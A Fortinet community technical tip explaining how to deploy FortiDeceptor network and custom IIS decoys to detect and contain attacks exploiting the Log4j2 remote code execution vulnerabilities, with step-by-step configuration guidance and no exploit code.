Help
FortiDeceptor
FortiDeceptor provides Deception-based Breach Protection to deceive, expose and eliminate external and internal threats.
mbensimon
Staff
Staff

Created on ‎12-22-2021 06:23 AM

Article Id 201741

Technical Tip: How to use FortiDeceptor to Detect & Mitigate the Log4j2 vulnerability

Description

This article describes how FortiDeceptor Decoys can detect activities related to the Log4j2 CVE-2021-44228 CVE-2021-45046 CVE-2021-45105 remote code execution vulnerability.

 

A 0-day exploit was discovered on a popular Java library Log4j2 that can result to a Remote Code Execution (RCE).

 

The Log4j2 is a Java-based logging utility that is part of the Apache Software

Cyber Deception Against cyber attacks that try to leverage Log4j2 vulnerability.

 

1) FortiDeceptor starts by deploying network decoys across the network segments that create a fake environment that simulates the real network and assets.

The 'Log4j2' exploit looks to attack web applications, so Network decoys like Ubuntu & CentOS with web server enabled will be deployed across several network locations such as Data Center/ DMZ / Cloud.

 

2) In addition, the FortiDeceptor customization module allows to generate a  decoy template from the customer gold image and deploy it across the network and in the customer data center. The ability to deploy a Decoy that runs the customer gold image and part of the customer domain network will expand the attack surface for any malware or threat actor trying to leverage the 'Log4j2' vulnerability.

 

In addition, this decoy will generate accurate threat intelligence and IOC's against the attack.
Scope

The Deception Decoys & lures against the 'Log4j2' vulnerability attacks can be used in FortiDeceptor V.3.3 and above.
Solution

Cyber Deception Against 'Log4j2' attacks:

 

1) Configure network segments under the 'Deployment Network' section that FortiDeceptor will use to deploy network decoys. (due to the nature of the attack, verify that  the Data Center/ DMZ / Cloud segments are covered where WEB servers are located).

 

2) Use the 'Customization' feature to deploy windows2016/2019 Decoy that runs Windows IIS Server. (see this video for technical instruction on how to use the customization module-> https://video.fortinet.com/products/fortideceptor/3.0/fortideceptor-windows-customization ).

 

3) Deploy network Decoys (Linux with WEB enabled) across the Data Center/ DMZ / Cloud segments network VLANs segments that are configured under the 'Deployment Network' section.

 

4) Once a threat actor or malware tries to penetrate a decoy with a web server, Fortideceptor will trigger a real-time alert.

 

5) FortiDeceptor will leverage the Fortinet Fabric to execute a threat mitigation response to isolate the threat.
Preview file
243 KB
484
0 Kudos
Submit Article Idea
Contributors
Broad. Integrated. Automated.

The Fortinet Security Fabric brings together the concepts of convergence and consolidation to provide comprehensive cybersecurity protection for all users, devices, and applications and across all network edges.

Social Media
Security Research
Company
News & Articles
Contact Us

Copyright 2024 Fortinet, Inc. All Rights Reserved.